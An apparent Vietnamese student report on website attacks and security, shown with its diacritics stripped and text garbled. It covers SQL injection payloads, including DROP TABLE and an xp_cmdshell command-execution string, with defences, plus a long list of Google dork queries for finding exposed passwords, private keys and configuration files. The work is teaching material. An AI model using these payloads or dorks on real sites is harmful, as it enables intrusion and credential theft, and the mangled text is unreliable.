da tim hieutan cong va bao mat web - duong hoang dai - nguyentuandat

8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat

1/98

BCNG THNG

TRNG CAO NG K THUT CAO THNG

KHOA IN T - TIN HC

N:

TM HIU V TN CNG VBO MT WEBSITE

Gio vin hng dn: C Nguyn Th Thanh Thun

Nhm sinh vin thc hin:

Dng Hong i MSSV: 306081018

Nguyn Tun t MSSV: 306081020


2/98

n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website

2

Nhn xt ca gio vin

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................

.....................................................................................................................


3/98


3

Mc lc

I. Gii thiu chung .................................................................... trang 04

II. Mt scch thc tn cng website ...................................... trang 11

1. Sdng li SQL- Injection ............................................... trang 11

2. SdngCng ctm kim ca Google........................... trang 17

3. Sdng JavaScript Inline ............................................. trang 25

4. DDOS .............................................................................. trang 28

III. Mt scch bo mt cho website ........................................ trang 29

1. SSL(Secure Socket Layer) ............................................. trang 29

2. Cc cng ckho st v tm li cho webserver .............. trang 71

* Super Scan ................................................................... trang 75

*SNIFFER ....................................................................... trang 78

*CAIN .............................................................................. trang 81

IV. Kt lun ................................................................................. trang 98


4/98


5/98


5

I. Gii thiu chung v website

Trc khi tm hiu vn tn cng v bo mt website, chng ta hy tim hiu

website l g? V chng hot ng nh thno?

Website l mt i ch mng dng http://www.companyname.com hay

http://www.companyname.com.vn .trong c cha nhu trang web th

hin nhiu thng tin siu vn bn nh: hnh nh, m thanh, flash, v mt

hay nhiu chno v c lp trnh bi mt mt ngn ngno , v

dnh html, C#, php, Website c m bi mt trnh duyt no c sn

trong my tnh ca bn, v dnh Internet Explorer, Google Chrome, Opera,

Thng thng, website c chia thnh 2 loi:

- Website tnh: l website khng c C S D Liu m ch l cc trang

web do ngi thit k to thnh bng cc phn mm to trang website.

Website ny thch hp cho nhng ni dung trnh by phc tp, i hi cao v

ha v t thay i v ni dung v vic cp nht website ny phi do nhngngi c chuyn mn thc hin v kh tn cng.

- Website ng: l website c C S D Liu do cc cng ty thit k chuyn

nghip xy dng v s bn giao cng c qun l, cp nht website cho khch

hng. Vic cp nht website rtn gin v tin li. Thng tin trn website

thng xuyn c cp nht v khng gii hn lng thng tin.

Trang web l mt trang trong mt website no c dng nhhttp://www.companyname.com/example.html . Trong example.html l tn

ca trang web .

Tn min (domain): tn min chnh l a chwebsite, website bt buc phi

c tn min. Tn min c nhiu dng www.abc.com hay www.abc.net hay

www.abc.com.vn... C nhng website khng mua tn min ring m dng tn

min con (sub-domain) dng www.abc.com/xyz. Dng tn min con nh vy
http://www.companyname.com/http://www.companyname.com/http://www.companyname.com.vn/http://www.companyname.com.vn/http://www.companyname.com/example.htmlhttp://www.companyname.com/example.htmlhttp://www.companyname.com/example.htmlhttp://www.companyname.com.vn/http://www.companyname.com/


6/98


6

khng phi tn tin mua m trn nguyn tc l website m (tc

www.abc.com) c thm vi trm, nghn tn min con nh th.

Dch v lu tr (hosting): mun nhng trang web c hin ln khi ngi ta

truy cp n th chng phi c lu tr trn mt my tnh (my phc v -

server) m lc no cng hot ng v kt ni vi mng Internet. Nu my tnh

ny c s c b tt trong mt thi im no th lc khng ai truy cp

c nhng website lu tr trn my tnh . Ty theo nhu cu m doanh

nghip c th chn mua hosting vi dung lng 10MB (tc cha c ti a

10MB d liu), 20MB, 50MB, 100MB hay nhiu hn. Gi hosting hin nay

cng rt thp, chtvi chc nghn n mt hai trm nghn ng mi thng.

Hacker/Hacking: hacker l nhng ngi thch nghin cu v bo mt trn

Internet v thc tp bng cch i nh ph nhng website no s h v

bo mt. Ni chung, khng mt website no trn th gii m dm tuyn b

bo mt tuyt i. Hacker c thcp tn min ca website, c ththay i

ni dung ca website, c th tn cng t (cc lnh yu cu server hot

ng) lm cho website bt lit trong mt khong thi gian. Nhng vic ny

doanh nghip nn hi nh cung cp dch v hosting ca mnh xem h c

chnh sch phc hi nh thno.

Nh vy, mt website th cn phi c mt tn min (Domain) , mt ni lu tr

cc trang web (Hosting) v c s d liu (Database) lun kt ni internet.

Bo mt website l g? Ti sao chng ta cn phi bo mt website?

Bo mt website l dng nhng cng c bo mt website m bo an ton

cho website ca mnh, ngn chn ti a s tn cng ca cc Hacker mun

xm nhp v ph hoi hoc ly thng tin mt trong website ca mnh, m

bo c s d liu c an ton.

V sao cn bo vc s d liu ca website ? C s d liu ca website l

mt phn rt quan trong ca mt cng ty, nu mt c s d liu ny sgy

nh hng nghim trng n hot ng ca cng ty. V d : mt cng ty abc


7/98


7

c trang web : abc.com.vn b hacker tn cng v sa d liu ca website

thnh mt cng ty khc, nhng ngi c nhu cu lin lc vi cng ty thng

qua website s cm thy tht vng vcng ty ny, bi website ca h b

hack, nh vy l nh hng n danh tin ca cng ty, cha kn vic cchacker cung cp thng tin ti chnh hay cc dn ca cng ty ny cho cc

cng ty khc ang c nhu cu cnh tranh, lm thit hi ti sn ca cng ty.

Mt cng ty c s hu mt website s rt nguy him. Th ti sao cng ty no

cng c mt website cho ring mnh? Di y l mt sl do :

1. Thit lp s hin din

C xp x 300 triu ngi trn th gii truy cp vo mng Internet v slng ny khng ngng c tng ln hng ngy. Vic tip cn c d ch1% nhm khchhng ny cng l 1 thnh cng ca doanh nghip.

l mt phn khng nh ca cng ng x hi, hy cho h bit rng bnquan tm ti vic phc v c cng ng ny, bn cn phi c mt trn mngInternet. Bn nn bit rng, i th cnh tranh ca bn cng ang lm nhvy.

2. Tn dng hon ton cc c hi tip xcNhiu khi cng vic kinh doanh c hiu mt cch n gin l giao tip vikhch hng. Mi doanh nhn khn ngoan u hiu rng: "B quyt thnh cngkhng nm ch nhng g bn bit m chnh l ch bn bit ti nhngkhch hng no". Cc doanh nhn u mun tn dng cc cuc gp g thngthng thnh cng vic kinh doanh c li v vic trao danh thip l mt vicc coi trng trong qu trnh ny. Nhng iu g s xy ra khi doanh nghipcn phi gp g hng ngn, thm ch hng triu i tc lm n, liu ccdoanh nghip c th tip xc cng mt lc vi tt c cc khch hng. iu

ny c th c gii quyt ht sc n gin, ti mi lc, mi ni, mi thiim thng qua cc trang Web trn mng Internet.

3. To ra ngun thng tin sn c cho i tc

Khi bn mun to cc trang thng tin, qung co, c th bn s ng chngtrn mc qung co, trang vng, nhng thi gian s lm cho bn phi tnh li.V, lm th no khch hng quan tm c th lin h c ngay vi bn?Phng thc thanh ton trong mi dch v s nh th no? Qung co trangvng s kh khn trong vic ny v y vn ch l mt loi phng tin truyn

thng c khong cch. Trong thi i hin nay, cc thng tin i hi phinhanh chng hn v mang tnh a chiu hn. Internet s gip bn lm c


8/98


8

iu thng qua nhng trang thng tin c duy tr lin tc 24/24 gi trongngy v 07 ngy trong tun. Khch hng c th xem thng tin v doanhnghip ca bn bt k lc no h mun, thmch ngay c khi bn ang ng.

4. Phc v khch hng hiu qu

Cng ngh Internet s mang li cho doanh nghip ca bn nhiu cch hn phc v khch hng. Liu bn c i ng nhn vin trc in thoi tipnhn cc yu cu ca khch hng v cung cpthng tin dch v m h cn?Liu khch hng c th t ng tra cu vo c s d liu, tm kim cc thngtin v dch v bn ang tin hnh m h mun khng? Tt c iu ny khchhng c th l c 1 cch n gin v nhanh chng thng qua chnhWebsite ca doanh nghip bn.

5. Thu ht s quan tm ca dn chng

Bn kh m thuyt phc c cc tp ch ng bi v vic bn khai trngmt ca hng mi nhng bn li c th thuyt phc c h ng bi nu tnWebsite ca bn v trang Web mi v c nhiu iu th v. Vi cc thngtin nh vy, bt k ngi s dng Internet no cng c th truy cp voWebsite tm hiu v doanh nghip ca bn v c th tr thnh khch hngtim nng.

6. Cng b thng tin vo bt k thi gian no

Nu bn cn phi cng b cc ti liu trc lc na m th s nh th no?Gi s l tin khn cp, cng b cc gii thng ca chng trnh khuynmi,... Nu bn gi cc tin ny ti cc ta son bo th bn s gp phi trngi v thi gian: Thng tin ca bn ch c pht hnh cng vi gi phthnh ca bo v khng th thay i sau khi bo c pht hnh. ViInternet, bn hon ton c th thay i tin tc mi cho Website ca doanhnghip trong vng vi giy ng h, nhng thng tin mi nht s c cpnht v s c chuyn ti nhng ngi mong i m khng phi qua bt kngi a tin no.

7. bn hng ha

Internet em li cho doanh nghip ca bn mt c hi ln bn c th bnhng ha. S pht trin ca Internet trn ton th gii ko theo s ra i vm rng camt th trng khch hng mi y tim nng - cng ng ngis dng Internet. Liu bn c nn chn ch khi m cc i th cnh tranhtrong kinh doanh ca bn ang dn tng bc thm nhp v chim lnh thphn trn Internet?

8. Gii thiu sn phm sinh ng


9/98


9

Nu sn phm ca bn l nhng chic my th khch hng s thc s bthuyt phc khi nhn thy n hot ng ra sao. Internet m ra cho bn nhiucch thc gii thiu sn phm tht sinh ng ti khch hng thng quaWebsite bng hnh nh, m thanh, cc on phim ngn, iu ny s khin cckhch hng tim nng s n vi bn nhiu hn, khng mt quyn sch giithiu no c th lm c nh vy.

9. Vn ti mt th trng dn chng c thu nhp cao

S lng ngi tham gia vo mng Internet c th to ra mt th trng snc ng o nht. Nhng ngi s dng Internet thng l nhng ngi ctrnh hc vn, c hiu bit v a v n nh, thu nhp cao trong x hi.Chnh v vy, tip cn c v chim lnh th trng khch hng ny l ium bt kdoanh nghip kinh doanh no cng mong mun t c.

10. Tr li cc cu hi thng gp

Bt k ngi trc in thoi no trong cng ty bn cng u ni rng h dngphn ln thi gian ca mnh tr li cc cu hi gn nh ging nhau. lnhng cu him cc khch hng mun hi trc khi h giao dch vi bn.

a nhng cu hi ny ln Website s gip bn loi b c nhng ro chni vi cng vic kinh doanh v gii phng bt thi gian cho nhn vin trcin thoi.

11. Gii quyt thng tin ni b

Cc nhn vin bn hng lu ng c th cn nhng thng tin cp nht tngpht gip h bn hng cng nh gip cho vic kinh doanh lun n . Nubn bit thng tin g cn thit, bn c th a chng ln 1 Website ring. Vimt cuc truy cp Internet thngqua in thoi ni ht, nhn vin bn hngca doanh nghip bn bt k ni u trn th gii s nhn c nhngthng tin y nht m khng phi tr cc ph ng di v nhng nhnvin vn phng khng bn rn thm.

12. M rng ra th trng quc t

Vi vic kinh doanh thng thng bn khng th gi th, in thoi hay phbin cc quy nh ti tt c mi khch hng tim nng trn th trng th gii,nhng vi Website bn c th hi thoi trc tip vi khch hng quc t nhl vi mt khch hng trong ni ht. Khi doanh nghip ca bn c cc vnphng i din nc ngoi, h s truy cp vo ngun thng tin ca vnphng trong nc vi chi ph phi tr vh bng mt cuc in thoi gi ni ht.

13. Hnh thnh dch v 24 gi

Chng ta khng phi lcno cng c nhng cng vic cng chung mt lchtrnh. Cng vic kinh doanh l khp mi lc, mi ni ch khng phi ch l thi


10/98


10

gian cng s. Khi cng vic kinh doanh gia Chu u v Chu ang thchin th s khc bit v thi gian s l iu cn trln. Cc Website s phcv khch hng v cc i tc ca bn 24/24 gi trong ngy, 07/07 ngy trongtun. Thng tin c th c khch hng la chn theo nhu cu v cc thngtin m h coi l quan trng, chnh iu ny s a bn dn u trong cuccnh tranh ngay c khi bn ngoi vn phng lm vic.

14. Thay i thng tin hin thi 1 cch nhanh chng

C nhng thng tin b thay i trc khi n c in ra. V bn s c mt nggiy t c cng nh khng c gi tr ln ln nhau. Cc n phm in t c ththay i theo nhu cu ca bn m khng cn n giy t, bt mc hay han. Bn cn c th gn Website ca doanh nghip vi 1 c s d liu mbn c th thay i bao nhiu ln trong 1 ngy cng c ty theo yu cu.Chng c giy t no c th gip bnthc hin c s nng ng .

15. Cho php bn tip nhn thng tin phn hi t pha khch hng

Vi Website bn c th yu cu thng tin phn hi t pha khch hng ngaylp tc khi h ang gh thm Website ca doanh nghip bn. iu ny gipbn tit kim c rt nhiu thi gian v tin bc hoch nh cc chinlc qung co v kinh doanh trn c s nhng thng tin nm bt c tpha khch hng m khng phi mt thm khon chi no na. Cu tr li cakhch hng c a ln Website ngay khi khchhng tm hiu sn phm vc chuyn lp tc ti a ch e-mail ca bn.

16. Th nghim dch v v sn phm mi trn th trng

Khi a ra mt sn phm mi trn th trng, iu m tt c cc doanhnghip phi lm l qung co v gii thiu sn phm . Vi cc phngphp qung co truyn thng, y s l mt cng on rt tn km v i hikinh ph ln. Nhng nu bn gii thiu, qung co sn phm mi trnWebsite ca doanh nghip bn, bn s bit rng c th ch i g t nhngkhch hng truy cp voWebsite, h chnh l th trng t tn km nht mbn vn ti. H cn c th cho bn bit h ngh g v sn phm ca bn 1

cch nhanh nht, d dng nht vi mt chi ph t hn bt k th trng no mbn vn ti.

17. Phng tin truyn thng linh hot

Ngy nay, Internet c nh gi l h thng truyn dn chuyn nghip nhtbi v sn phm chnh ca n l cc thng tin c tip cn mt cch ddng, nhanh chng v r tin. Tt c cc n phm c truyn trn Internetang ngy cng tr nn ph bin bi v cc cng vic u c thc hintrong mi trng k thut s t rt nhiu ngun thng tin cung cp. Tt c

nhng cng vic ny thc hin mt cch d dng thng qua cc trang Webtrn chnh Website ca doanh nghip bn.


11/98


11

18. Tip cn mt th trng ca gii tr v mang tnh gio dc

hu ht cc trng i hc u cho sinh vin tip cn vo Internet, giihc sinh ph thng s tng bc lm quen v s dng dch v Internet trongnhiu nm ti. Nhu cu v sch v, trang phc th thao, cc kha hc, thitrang tr v rt nhiu th khc s tr thnh nhu cu a dng ca th trngtrn Internet. Thm ch ngay c khi p dng dch v thng mi in t trnmng v tui th trung bnh c phn tng ln th s tng trng ca khu vcth trng tui di 25vn tip tc.

19. Tip cn mt th trng c tnh chuyn nghip

Mng Internet khng n thun ch l nhng my tnh m n cn l ni mingi c th mua bn, trao i bt k th g t chic bn chi nh rng, cctc phm ngh thut cho n cc bi hc ting Anh,... Vi 70 triu ngi s

dng thng xuyn v s lng ngi s dng tng ln hng ngy, thng tinkinh doanh ca bn c th c gii thiu cho mt s lng ngi rt ln.

20. Phc v ti th trng a phng

Chng ta ni v sc mnh ca vic phc v nhu cu trn th trng quct thng qua Internet, nhng cn khu vc th trng ngay a phng cabn th sao? Cu tr li l: chnh khch hng trong a phng bn thng quacc hot ng marketing, h s bit ti Website, truy cp thng tin trnInternet v mang li li nhun cho cng ty bn. Cho nn d cng ty c t

u th thng qua mng Internet, nhng khch hng tim nng vn bit nbn v bn cng s sn sng phc v h.

II. Mt scch thc tn cng website

1. S dng li SQL injection

1.1 SQL Injection l g?

Khi trin khai cc ng dng web trn Internet, nhiu ngi vn ngh rngvic m bo an ton, bo mt nhm gim thiu ti a khnng b tn cngtcc tin tc chn thun tp trung vo cc vn nh chn hiu hnh,h qun trc s d liu, webserver s chy ng dng, ... m qun mt rngngay c bn thn ng dng chy trn cng tim n mt l hng bo mtrt ln. Mt trong scc l hng ny l SQL injection. Ti Vit Nam, qua thi k cc qun tr website l l vic qut virus, cp nht cc bn v li tcc phn mm h thng, nhng vic chm sc cc li ca cc ng dng lirt t c quan tm. l l do ti sao trong thi gian va qua, khng twebsite ti Vit Nam b tn cng v a su l li SQL injection [1]. Vy SQLinjection l g ?

SQL injection l mt k thut cho php nhng k tn cng li dng lhng trong vic kim tra d liu nhp trong cc ng dng web v cc thng


12/98


12

bo li ca h qun trc s d liu "tim vo" (inject) v thi hnh cc culnh SQL bt hp php (khng c ngi pht trin ng dng lng trc).Hu qu ca n rt tai hi v n cho php nhng k tn cng c th thc hincc thao tc xa, hiu chnh, do c ton quyn trn c s d liu ca ngdng, thm ch l server m ng dng ang chy. Li ny thng xy ratrn cc ng dng web c d liu c qun l bng cc h qun trc s dliu nh SQL Server, MySQL, Oracle, DB2, Sysbase.

1.2. Cc dng tn cng bng SQL Injection

C bn dng thng thng bao gm: vt qua kim tra lc ng nhp(authorization bypass), s dng cu ln SELECT, s dng cu lnh INSERT,s dng cc stored-procedures [2], [3].

Dng tn cng vt qua kim tra ng nhp

Vi dng tn cng ny, tin tc c th ddng vt qua cc trang ngnhp nhvo li khi dng cc cu lnh SQL thao tc trn c s d liu cang dng web.

Xt mt v din hnh, thng thng cho php ngi dng truy cpvo cc trang web c bo mt, h thng thng xy dng trang ng nhpyu cu ngi dng nhp thng tin vtn ng nhp v mt khu. Sau khingi dng nhp thng tin vo, h thng s kim tra tn ng nhp v mtkhu c hp lhay khng quyt nh cho php hay t chi thc hin tip.

Trong trng hp ny, ngi ta c thdng hai trang, mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin nhp t

pha ngi dng. V d:

execlogin.asp

login.htmUsername:
Password:


13/98


14/98


14

cho mt gi trkhc, v t, khi u cho mt cuc tn cng bt hp php,v dnh: 0 OR 1=1(ngha l, http://www.myhost.com/shownews.asp?ID=0or 1=1).

Cu truy vn SQL lc ny s tr v tt ccc article t bng d liu v

n s thc hin cu lnh:SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1

Mt trng hp khc, v dnh trang tm kim. Trang ny cho phpngi dng nhp vo cc thng tin tm kim nh H, Tn, on mthng gp l:

Tng tnh trn, tin tc c th li dng s htrong cu truy vn SQL nhp vo trng tn tc gi bng chui gi tr:

' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE''=' (*)

Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh sthc hin thm lnh tip theo sau tkha UNION na.

Tt nhin cc v dni trn, dng nh khng c g nguy him, nhnghy thtng tng k tn cng c thxa ton bc s d liu bng cchchn vo cc on lnh nguy him nh lnh DROP TABLE. V d nh: '

DROP TABLE T_AUTHORS -Chc cc bn s thc mc l lm sao bit c ng dng web b li

dng ny c. Rt n gin, hy nhp vo chui (*) nh trn, nu h thngbo li vc php dng: Invalid object name OtherTable; ta c th bit chcl h thng thc hin cu SELECT sau tkha UNION, v nh vy mi cth tr v li m ta ctnh to ra trong cu lnh SELECT.

Cng sc thc mc l lm thno c th bit c tn ca cc bngd liu m thc hin cc thao tc ph hoi khi ng dng web b li SQLinjection. Cng rt n gin, bi v trong SQL Server, c hai i tng l

sysobjects v syscolumns cho php lit k tt ccc tn bng v ct c trongh thng. Ta chcn chnh li cu lnh SELECT, v d nh:


15/98


15

' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l cth lit k c tn tt ccc bng d liu.

Dng tn cng s dng cu lnh INSERTThng thng cc ng dng web cho php ngi dng ng k mt ti

khon tham gia. Chc nng khng th thiu l sau khi ng k thnh cng,ngi dng c thxem v hiu chnh thng tin ca mnh. SQL injection c thc dng khi h thng khng kim tra tnh hp l ca thng tin nhp vo.

V d, mt cu lnh INSERT c th c c php dng: INSERT INTOTableName VALUES('Value One', 'Value Two', 'Value Three'). Nu on mxy dng cu lnh SQL c dng :

Th chc chn s b li SQL injection, bi v nu ta nhp vo trng thnht v dnh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc

nycu truy vn s l: INSERT INTO TableName VALUES(' ' + (SELECTTOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). Khi , lc thc hinlnh xem thng tin, xem nh bn yu cu thc hin thm mt lnh na l: SELECT TOP 1 FieldName FROM TableName

Dng tn cng s dng stored-procedures

Vic tn cng bng stored-procedures sgy tc hi rt ln nu ngdng c thc thi vi quyn qun tr h thng 'sa'. V d, nu ta thay onm tim vo dng: ' ; EXEC xp_cmdshell cmd.exe dir C: '. Lc ny hthng s thc hin lnh lit k th mc trn a C:\ci t server. Vic phhoi kiu no tu thuc vo cu lnh ng sau cmd.exe.

1.3. Cch phng trnh

Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cclp trnh vin pht trin ng dng web khi x l cc d liu nhp vo xydng cu lnh SQL. Tc hi t li SQL injection ty thuc vo mi trng vcch cu hnh h thng. Nu ng dng s dng quyn dbo (quyn ca ngis hu c s d liu - owner) khi thao tc d liu, n c thxa ton bccbng d liu, to cc bng d liu mi, Nu ng dng s dng quyn sa(quyn qun tr h thng), n c thiu khin ton b h qun trc s dliu v vi quyn hn rng ln nh vy n c th to ra cc ti khon ngidng bt hp php iu khin h thng ca bn. phng trnh, ta c th


16/98


16

thc hin hai mc:

1.3.1. Kim sot cht ch d liu nhp vo

phng trnh cc nguy c c th xy ra, hy bo vcc cu lnhSQL l bng cch kim sot cht ch tt ccc d liu nhp nhn c t

i tng Request (Request, Request.QueryString, Request.Form,Request.Cookies, and Request.ServerVariables). V d, c th gii hn chiudi ca chui nhp liu, hoc xy dng hm EscapeQuotes thay thccdu nhy n bng 2 du nhy n nh:

Trong trng hp d liu nhp vo l s, li xut pht t vic thay thmt gi trc tin on l d liu s bng chui cha cu lnh SQL bthp php. trnh iu ny, n gin hy kim tra d liu c ng kiu haykhng bng hm IsNumeric().

Ngoi ra c thxy dng hm loi b mt sk tv tkha nguyhim nh: ;, --, select, insert, xp_, ra khi chui d liu nhp tpha

ngi dng hn chcc tn cng dng ny:

1.3.2. Thit lp cu hnh an ton cho h qun trc s d liu

Cn c c ch kim sot cht chv gii hn quyn xl d liu nti khon ngi dng m ng dng web ang s dng. Cc ng dng thngthng nn trnh dng n cc quyn nh dbo hay sa. Quyn cng b hn

ch, thit hi cng t.


17/98


17

Ngoira trnh cc nguy c tSQL Injection attack, nn ch loi bbt k thng tin k thut no cha trong thng ip chuyn xung cho ngidng khi ng dng c li. Cc thng bo li thng thng tit lcc chi tit kthut c thcho php k tn cng bit c im yu ca h thng.

Tham chiu[1]. Danh sch cc website b li SQL injection: http://www.security.com.vn/[2]. SQL Injection FAQ:

http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=2&tabid=3 [3].

Advanced SQL Injection :

http://www.nextgenss.com/papers/advanced_sql_injection.pdf [4].

Preventing SQL Injection:

http://www.owasp.org/asac/input_validation/sql.shtml [5]. SQL Injection

Attacks -Are You Safe? http://www.sitepoint.com/article/794

2. S dng cng ctm kim ca Google

Google l my tm kim mnh mv ph bin nht th gii,n c khnng chp nhn nhng lnh c nh ngha sn khi nhp vo v cho nhngkt qukhng thtin c. iu ny cho php nhng ngi dng c d tmnh tin tc, crackers, v script kiddies v.v... s dng my tm kim Google thu thp nhng thng tin b mt v nhy cm, nhng ci m khng thnhn

thy qua nhng tm kim thng thng.Vi nhng c php tm kim nng caoc thtm ra nhng site li hoc server d b tn cng.

Nhng c php tm kim nng cao vi Google

[intitle:]

Gip Google gii hn kt qutm kim v nhng trang c cha ttrong tiu . V d, intitle: login password (khng c ngoc kp) s cho ktqul nhng link n nhng trang c t"login" trong tiu , v t

"password" nm u trong trang.

Tng t, nu ta mun truy vn nhiu hn mt ttrong tiu ca trang thta c thdng allintitle: thay cho intitle c kt qul nhng trang ccha tt c nhng t trong tiu . V dnh dng:intitle: login intitle: password cng ging nh truy vn allintitle: loginpassword.

Mt scu lnh intitle ph bin:

intitle:"Index of" service.pwd


18/98


18

Directory listing contains service.pwd file(s)intitle:"Index of" view-sourceDirectory listing contains view-source file(s)intitle:"Index of" adminDirecory listing contains administrative files or directoriesintitle:"Index of" .htpasswdDirectory listing contains .htpasswd file!intitle:"Index of" log.txtDirectory listing contians log text filesintitle:"Index of" stats.htmlDirectory listing contains stats.html which may contain useful web server

statistics"access denied for user" "using password"Web page contains error message which might provide useful

application information"A syntax error has occurred" filetype:ihtmlWeb page contains error message which might provide useful

application information"ORA-00921: unexpected end of SQL command"Web page contains error message which might provide useful

application informationinurl:passlist.txtThe passlist.txt file may contain user passwords"Index of /backup"Directory may contain sensitive backup filesintitle:"Index of" .bash_historyDirectory listing contains bash history informationintitle:"Index of" index.html.bakDirectory listing contains backup index file (index.html.bak)intitle:"Index of" index.php.bakDirectory listing contains backup index file (index.html.bak)intitle:"Index of" guestbook.cgiDirectory listing contains backup index file (index.html.bak)intitle"Test Page for Apache"

Default test page for Apacheintitle:index.of.etcDirectory listing of /etc ?filetype:xls username passwordXLS spreadseet containing usernames and passwords?"This file was generated by Nessus"Nessus report!intitle:"Index of" secring.bakSecret key fileintitle:"Terminal Services Web Connection"

Access terminal services!intitle:"Remote Desktop Web Connection"


19/98


19

Access Remote Desktop!intitle:"Index of" access_logDirectory listing contains access_log file which may store sensitive

informationintitle:"Index of" finance.xlsDirectory listing contains finance.xls which may contain sensitive

informationintitle:"Usage Statistics for"Statistical information may contain sensitive dataintitle:"Index of" WSFTP.LOGWSFTP.LOG file contains information about FTP transactionsintitle:"Index of" ws_ftp.iniDirectory listing contains password file(s)?The ws_ftp.ini file may contain usernames and passwords of FTP users"not for distribution" confidentialURL may contain confidential or sensitive information"phpMyAdmin" "running on" inurl:"main.php"phpMyAdmin allows remote mysql database administration"#mysql dump" filetype:sqlmysql database dumps"This summary was generated by wwwstat"Database statistics"Host Vulnerability Summary Report"Vulnerability report!"Network Vulnerability Assessment Report"Vulnerability report!inurl:php.ini filetype:iniThe php.ini file may contain sensitive PHP environment details.BEGIN (CERTIFICATE|DSA|RSA) filetype:keyPrivate key(s)!BEGIN (CERTIFICATE|DSA|RSA) filetype:csrPrivate key(s)!BEGIN (CERTIFICATE|DSA|RSA) filetype:crtPrivate key(s)!

intitle:"Index of" passwd passwd.bakpasswd file!intitle:"Index of" master.passwdmaster.passwd file!intitle:"Index of" pwd.dbpwd.db file may contain password informationintitle:"Index of..etc" passwdpasswd file!filetype:cfg ks intext:rootpw -sample -test -howtoThis file may contain the root password (encrypted)

intitle:"index.of.personal"Directory may contain sensitive information


20/98


20

intitle:"Index of" login.jspThe login.jsp file may contain database username or password

informationintitle:"Index of" logfileDirectory may contain sensitive log filesfiletype:php inurl:"viewfile" -"index.php" -"idfilFile may contain PHP source codeallinurl:intranet adminPage may contain sensitive information"supplied argument is not a valid MySQL result resource"mysql error message may reveal sensitive information"Error Diagnostic Information" intitle:"Error Occurred While"Error message may reveal sensitive informationHTTP_USER_AGENT=GooglebotPage may contain sensitive environment details

[ inurl: ]

C php inurl: gii hn kt qutm kim v nhng a chURL c cha tkha tm kim. V d: inurl: passwd (khng c ngoc kp) s cho kt qulnhng link n nhng trang c t "passwd" trong URL.Tng t, nu ta mun truy vn nhiu hn mt t trong URL th ta c thdng allinurl: thay cho inurl c kt qul nhng URL cha tt c

nhng tkha tm kim.V d: allinurl: etc/passwd stm kim nhng URLc cha etc v passwd. K hiu gch cho (/) gia cc t s b Googleb qua.

[ site: ]

C php site: gii hn Google chtruy vn nhng tkha xc nh trong mtsite hoc tn min ring bit. V d: exploits site:hackingspirits.com (khng

c ngoc kp) stm kim tkha exploits trong nhng trang hin c trongtt ccc link ca tn min hackingspirits.com. Khng c khong trng nogia site: v tn min.

[ filetype: ]

C php filetype: gii hn Google chtm kim nhng files trn internet cphn m rng ring bit (V d: doc, pdf hay ppt v.v...). V d: filetype:docsite:gov confidential (khng c ngoc kp) stm kim nhng file c phn mrng l .doc trong tt c nhng tn min ca chnh phc phn m rng l

.gov v cha tconfidential(b mt) trong trang hoc trong file .doc. V d


21/98


21

. Kt qu s bao gm nhng lin kt n tt ccc file vn bn b trn ccsite ca chnh ph.

[ link: ]

C php link: s lit k nhng trang web m c cc lin kt n n nhngtrang web chnh. V d :chui link:SecurityFocus s lit k nhng trang web c lin kt trn trangch SecurityFocus.Ch khng c khong trng gia "link:" v URL ca trang Web.

[ related: ]

C php related: s lit k cc trang Web "tng t" vi trang Web chnh.

V d :related:www.securityfocus.com s lit k cc trang web tng t vi trangch Securityfocus. Nh rng khng c khong trng gia "related:" v URLca trang Web.

[ cache: ]

Truy vn cache: s cho kt qul phin bn ca trang Web m m Google lu li. V d:cache:Hackingspirits scho ra trang lu li bi Google's.Nh rng khng c khong trng gia "cache:" v URL ca trang web.

Nu bn bao gm nhng tkhc trong truy vn, Google sim sng nhngtny trong vn bn c lu li.V d: cache:Hackingspiritsguest scho ra vn bn c lu li c t"guest" c im sng.

[ intext: ]

C php intext: tm kim cc t trong mt website ring bit. N pht lcclin kt hoc URL v tiu ca trang.V d: intext:exploits (khng c ngoc kp) s cho kt qul nhng lin kt

n nhng trang web c tkha tm kim l "exploits" trong cc trang ca n.

[ phonebook: ]

phonebook tm kim thng tin vcc a chng ph Mv sinthoi.

V d:phonebook:Lisa+CA s lit k tt ccc tn ngi c tLisa trong tn vCalifornia (CA). C php ny c thc s dng nh l mt cng c
http://www.securityfocus.com/http://www.securityfocus.com/http://www.securityfocus.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.securityfocus.com/


22/98


22

tuyt vi ca tin tc trong trng hp ai mun tm kim thng tin c nhncho cng vic x hi.

Truy vn cc site hoc server d b tn cng s dng cc c phpnng cao ca Google

S dng c php Index of tm kim cc site chophp duytch mcDi y l vi V d s dng c c quyn truy cp vo rtnhiu thng tin nhy cm ddng hn rt nhiu:

Index of /admin

Index of /passwd

Index of /password

Index of /mail

"Index of /" +passwd

"Index of /" +password.txt

"Index of /" +.htaccess

"Index of /secret"

"Index of /confidential"

"Index of /root"

"Index of /cgi-bin"

"Index of /credit-card"

"Index of /logs""Index of /config"

Tm kim cc site hoc server d b tn cng s dng c phpinurl: hoc allinurl:

